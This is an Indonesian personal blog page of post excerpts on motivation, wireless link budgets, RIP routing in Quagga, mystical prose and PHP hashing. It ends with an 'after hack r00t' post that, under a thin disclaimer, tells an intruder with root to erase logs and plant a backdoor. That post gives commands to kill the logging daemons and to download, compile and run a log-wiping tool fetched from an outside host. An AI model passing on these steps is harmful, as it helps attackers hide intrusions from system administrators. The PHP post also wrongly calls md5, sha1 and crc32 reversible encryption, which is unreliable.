Membeli Kesuksesan dengan Kegagalan!!!


Dalam hidup, kegagalan adalah bagian yang tak terpisahkan dari kesuksesan. Ketakutan akan kegagalan kadangkala membuat masa depan yang di idam – idam kan menjadi seolah tak tergapai (ciee.. bahasanya lebay)… Sering kali ketika terjadi sebuah kegagalan dari usaha yang dilakukan untuk menggapai kesuksesan, kita menjadi putus asa dan hilang harapan… saat hilang harapan muncul di hati kita kata – kata seperti:

‘gak berbakat gua di bidang ney’
‘udahlah gua memang bukan orang berotak encer’
dan sebagainya…..

Tapi tunggu dulu!!!
kalau begitu tanya kembali diri kita!  apakah kita mengenal kata ‘tidak berbakat’ pada saat kita belajar berjalan di waktu kecil? Mungkin, jika kita sudah mengenal kata – kata ini pada masa kanak – kanak, saat ini kita masih merangkak dan tidak bisa berjalan…

bayangkan pada saat kita baru belajar berjalan, kemudian kita terjatuh dan  menangis, apa pernah kita mengatakan pada diri ‘gua gak punya bakat berjalan’… tapi yang kita lakukan justru sebaliknya, ketika kita jatuh dan menangis… kita berhenti sebentar dan beberapa jam atau kesokan harinya kita mencoba lagi dan terus menerus kita mencoba tanpa kenal kata ‘tidak berbakat’…. semangat polos jiwa kanak – kanak kita yang tak kenal kata tidak bisa, menjadikan semua yang tak mungkin menjadi mungkin…

jika kita mencoba berfikir  mendalam, kita bisa melihat bahwa kita bisa berjalan atau ‘sukses berjalan’ harus dibayar dengan ‘gagal berjalan’ terlebih dahulu… jadi sebenarnya

Kegagalaan bukan akhir segalanya
Kegagalan bukan tanda tidak berbakat
Kegagalan bukan kehancuran

tapi

Kegagalan adalah proses menuju kesukesan
Kegagalan adalah anak tangga dari puncak kesuksesan
Kegagalan adalah jalur yang harus di lalui untuk sampai kepada kesuksesan

atau

Kesuksesan harus di bayar dengan Kegagalan
Continue reading

link budget calculator


gara – gara mau ngitung tentang kekuatan sinyal antar dua titik wireless yang saling terhubung, ane nyoba bikin sendiri kalkulatornya biar gak capek ngitung pake calculator biasa… rumus nya ane dapetin dari http://wndw.net, anda juga bisa baca bukunya gan, ada yang versi bahasa inggris dan ada juga yang versi bahasa indonesia yang diterjemahkan sama Kang Onno W. Purbo dan teamnya…

aplikasi ney masih sederhana n minimalis… maunya sech lebih lengkap tapi ya untuk sementara ney aja dah… maklum ilmu ane masih cupu gan…screenshoot nya kayak gene :

Continue reading

konfigurasi routing RIP di quagga


hmmm… kemaren di artikel sebelumnya ane udah ngejelasin tentang instalasi dan konfigurasi quagga, nah sekarang ane mau bahas lebih lanjut tentang routing protokol RIP di quagga…

protokol rip adalah protokol yang di gunakan oleh router untuk menentukan jalur terpendek berdasarkan hop count (jumlah lompatan) agar bisa mencapai jaringan tujuan. protokol rip merupakan interior gateway protocol (IGP) yang di gunakan di jaringan LAN maupun WAN. maksimum hop count adaalah 15 , jadi jika jalur untuk mencapai tujuan melalui lebih dari 15 titik atau 15 router maka jaringan tersebut tidak bisa di jangkau lagi. rip memiliki dua versi yaitu ripv1 dan ripv2, ripv1 hanya mendukung jaringan yang classfull dan contigues network, sementara ripv2 mendukung jaringan yang classless (vlsm/subnetting) dan  discontigues network.

sederhanya sebuah router tidak bisa menghubungkan jaringan yang berbeda yang tidak terhubung langsung dengannya tanpa protokol routing. selain rip masih banyak lagi protokol routing yang laen, tapi kaleee ney kita akan ngebahas implementasi rip pada quagga. okeg begini kasusnya….

perhatikan gambar di bawah ney gan…

Topology 3 Router

Topology 3 Router

Continue reading

Karena Aku Manusia


Aroma hari – hari ku yang selalu baru, semakin membuka mata ku untuk melihat realitas di balik dunia. Mungkin di masa yang lalu, pentas dunia sedang bermain dengan dunia imajinasi di balik kesendirian ku. Kini semua beriringan melihat cahaya di balik aurora, merangkai struktur diri dan menyerap superego sambil berjalan di bawah kaki langit. Berusaha memijakkan kaki diatas tanah rasionalitas walaupun kadang mengambang bersama idealitas yang masih samar tuk di replikasi menjadi tanah tuk menapakkan kaki.

Ku lihat warna yang berbeda beriringan bersama dinamika waktu dan materi yang menuntun hatiku tuk berefleksi bahwa ‘semua hanya fatamorgana’ sehingga membuka mata tuk fana’, yang kemudian menuntunku mengerti hikmah di setiap detik waktu yang dibekukan. Setiap hikmah membuatku menjadi sangat kecil, semakin mengerti semakin kecil eksistensi diri hingga hilang menjadi debu. Dan aku pun terlena dengan rasa dan nuansa yang semakin mendalam hingga arus semesta mengantarku ke samudra pembuka tuk mulai memasuki samudra di balik samudra.

Kini semua sudah jelas, tapi rasionalitas tidak mampu melaluinya sendiri karena aku manusia dan aku bukan sekedar eksistensi tentang realitas. Lebih dari itu aku bagian dari rencana yang tersusun untuk membentuk persepsi tentang realitas. Karena aku manusia yang menjadi perisai hidup dan mati, karena aku manusia dimana 99 warna telah termaktub dalam ruh diri.

Karena aku manusia, hidup untuk menyempurnakan rancangan semesta tentang 2 warna…. HITAM dan PUTIH…

enkripsi dan dekripsi di php


okeh ketemu lagi dengan saya di acara yang sama dan channel yang sama…. wkwkwkwkwkw… hmmm… sekarang ane mau bahas tentang enkripsi sekaligus dekripsi soalnya ney pasangan gak bisa dipisahin… seperti adam dan hawa, alah lebay ane… hehehehe… okeh, ane cukupun dulu lebuy bin maun….

jadi begini… enkripsi itu bahasa gampangnya kayak gene… ane punya surat yang mau dikirim ke orang, misalnya surat cinta… (teringat masa SMP, gak ada Ponsel) nah supaya gak ketauan sama orang gimana caranya ya??? ada bermacam – macam cara… salah satunya kirim lewat mimpi…. minta bantuan kawan dan masih banyak lage… nah misalnya kita pilih cara kirim lewat teman… yang jadi masalah… surat ini sangat rahasia, bahkan si temen deket yang ngirim ney juga gak boleh tau… trus gimana dunkz…??? di situlah kita bisa menggunakan metode enkripsi… jadi simple nya, lok jaman om dulu, tinggal ngerubah susunan kata nya kayak gini misalnya :

A = I, B = A, I=B, C=F

jadi kalau kita mau nulis AKU CINTA KAMU, berati nulisnya gene IKU FANTI KIMU…. hehehe….

untuk alasan keamanan kayak gene kemudian dikembangkan juga di komputer tentang enkripsi dan dekripsi… ane mungkin gak panjang lebar ngebahas konsep nya… soalnya anda masih bisa googling dan masih banyak di luar sana…  (lah yang anda bahas ini juga kan bisa di googling?) apa yang ane buat ini mungkin hanya menambah sedikit dari perbendaharaan aja ghitu loh…

okeh langsung aja… di PHP ada beberapa fungsi yang digunakan untuk melakukan proses enkripsi, misalnya kayak gene….

<?php
$crypt_md5=md5("dicoba");
$crypt_sha1=sha1("dicoba");
$crypt_crc32=crc32("dicoba");

echo "enkripsi kata 'dicoba' <br>";
echo "enkripsi md5       : ".$crypt_md5."<br>";
echo "enkripsi sha1      : ".$crypt_sha1."<br>";
echo "enkripsi crc32     : ".$crypt_crc32."<br>";
?>

Continue reading

trialisme diri di 1431H


waktu berlalu bersama poros langit yang terus bergerak menghempas ruang di fase – fase cahaya, trialisme diri menjadi tak terpungkiri sedang berdiri di antara mimpi dan realita tuk mempertanyakan eksistensi diri yang hakiki. tak tau apakah memang semua ini hanyalah sebuah havana di ruang mata atau inilah realita tentang sistem semesta. tabir hati semakin tebal tuk melihat meta warna ruh diri, hingga peta langkah hidup tak lagi jelas tuk di lalui.

aku, ilmu telah menyapaku di alexandria dan kota 1001 malam, mereka menjadi penerang langkahku tuk memilih ketepatan dan kebeneran serta memisahkannya dengan yang gelap. tiga kebijaksanaan diri pun meresapi semua itu dan mengerti, namun sisi manusiawi itu pun menang dari ruh pemberian sang Ilahi.

bukan karena aku tapi karena aku, bukan aku yang salah tapi aku yang menjadi sebab dalam kausalitas semesta tuk semua itu menjadi terlaksana. entah sampai kapan, tapi ini perangku… mungkin saat ini aku kalah dan kekalahan ku bukan akhir dari semuanya tapi awal dari trialisme diri yang makin membatu di tempa oleh waktu…

after hack r00t


ini murni untuk pembelajaran belaka, ane gak bertanggung jawab atas apa yang anda lakukan dengan penjelasan yang ane buat…

woukeh… sekarang ane berasumsi bahwa anda sudah mendapatkan root??? what next?? langkah selanjutnya adalah :

  1. menghapus log
  2. memasang backdoor

menghapus log

setelah anda menjadi root anda perlu menghapus log, karena dari log ini admin bisa mengetahui apa yang telah terjadi dalam sistemnya… termasuk siapa yang mengakses root , dengan IP Address mana dan tanggal berapa kejadiannya… selain itu siapa yang sedang terhubung ke sistem juga bisa di ketahui..  untuk itu agar jejak anda tidak di ketahui oleh si administrator maka anda perlu menghapus log… jangan menghapus log secara manual, gunakan tools yang sudah tersedia…

anda bisa menggunakan vanish.c atau wzap.c yang telah di sediakan di http://packetstormsecurity.org/UNIX/penetration/log-wipers/ , okeh begini perintah terminalnya :

killall syslogd
killall klogd
wget http://citbun.com/tools/other/vanish.c
cp vanish.c /root/vanish.c
gcc /root/vanish.c -o /root/vanish
cd /root
chmod +x vanish
./vanish

Continue reading